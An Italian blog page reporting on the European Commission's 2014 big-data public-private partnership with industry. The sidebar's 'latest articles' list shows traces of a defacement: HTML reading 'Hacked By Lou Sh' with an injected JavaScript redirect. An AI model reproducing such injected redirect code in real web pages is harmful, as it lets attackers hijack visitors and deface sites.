EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

Megadati: la Commissione lancia il partenariato pubblico-privato




Intesa tra la Commissione europea e l’industria dei dati

L’accordo stretto lo scorso 13 ottobre tra la Commissione e l’industria europea dei dati prevede un investimento di 2,5 miliardi di euro destinati alla gestione dei big data. In questo modo l’Europa potrà portarsi al pari degli altri Stati a livello mondiale. L’intesa sarà attiva a partire dal 1° gennaio 2015.

Investire nei megadati porterebbe alla creazione di circa 100.000 nuovi posti di lavoro entro il 2020 e potrebbe ridurre del 10% i consumi energetici in Europa, sviluppare l’assistenza sanitaria e avere a disposizione macchinari industriali più efficienti.

L’intesa in materia di megadati è stata firmata il 13 ottobre dal Vicepresidente della Commissione europea, Neelie Kroes, e dal presidente della Big Data Value Association, Jan Sundelin,, a favore di società come ATOS, Nokia Solutions and Networks, Orange, SAP, Siemens, ATC, IT Innovation, IBM, SINTEF, THALES, e istituti di ricerca come quello di Fraunhofer, il centro di ricerca tedesco sull’intelligenza artificiale, l’Università di Bologna (CINI), il Politecnico di Madrid e l’Università di Duisburg-Essen.

JPEG - 8.2 Kb

L’intesa tra la Commissione europea e l’industria dei dati permetterà a molti settori tra pubblico, privato e accademico di contribuire a sviluppare idee nuove nell’ambito dei megadati in settori come quello energetico, manifatturiero e della salute, per fornire servizi innovativi come la medicina su misura, la logistica degli alimenti e l’analisi predittiva. Inoltre, i settori coinvolti sono anche quelli della fotonica, della robotica, del calcolo di alte prestazioni, delle reti avanzate 5G per l’internet del futuro e per le fabbriche future. Tutti fanno parte dei maggiori settori a livello tecnologico che potrebbero portare alla creazione di nuovi posti di lavoro.

L’accordo permetterà inoltre di avere degli “spazi di innovazione”, in cui poter portare avanti le sperimentazioni sia per i settori pubblici che per i privati, in modo da poter sviluppare migliori competenze e pratiche da parte delle imprese.

JPEG - 12.8 Kb

Nelle parole del Vicepresidente della Commissione europea, Neelie Kroes: “I dati sono il motore e il cardine dell’economia futura. Qualsiasi tipo di organizzazione ha bisogno di elementi costitutivi per migliorare i propri risultati, dalle aziende agricole alle fabbriche, dai laboratori alle officine”.



Nessun commento
ds Aggiungere un commento

Autori

Vanessa Piacenti
Studentessa del corso di laurea triennale in Scienze della comunicazione, Università si Roma Tor Vergata.



Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France